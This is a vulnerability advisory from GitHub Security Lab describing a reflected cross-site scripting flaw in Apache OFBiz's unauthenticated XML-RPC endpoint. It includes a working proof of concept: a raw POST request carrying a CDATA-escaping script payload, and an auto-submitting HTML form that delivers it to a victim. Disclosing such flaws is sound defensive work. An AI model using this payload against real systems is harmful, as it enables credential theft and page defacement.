Apache OfBiz is vulnerable to Reflected Cross-Site Scripting through POST request
/webtools/control/xmlrpc exposes some unauthenticated services such as
ping. We can use this service to reflect arbitrary data and get a Cross-Site Scripting issue
POST /webtools/control/xmlrpc?echo=foo HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: https://localhost:8443 Connection: keep-alive, Upgrade Pragma: no-cache Cache-Control: no-cache Content-Type: application/xml Content-Length: 140 ]]></string><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script><string><![CDATA[
A POST XSS issue can be triggered by fooling the victim into visiting a malicious page. e.g:
<html> <body> <form name=TheForm action=http://localhost:8080/webtools/control/xmlrpc?echo=foo method=post enctype="text/plain"> <input type=hidden name=foo value="]]></string><a:script xmlns:a='http://www.w3.org/1999/xhtml'>alert(document.domain)</a:script><string><![CDATA[" > </form> <script> document.TheForm.submit(); </script> </body> </html>
This issue may lead to a variety of attacks from page defacements to stealing user/admin credentials. In conjunction with any SSTI issues this issue can be escalated into a
Remote Code Execution.
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
You can contact the GHSL team at
email@example.com, please include the
GHSL-2020-068 in any communication regarding this issue.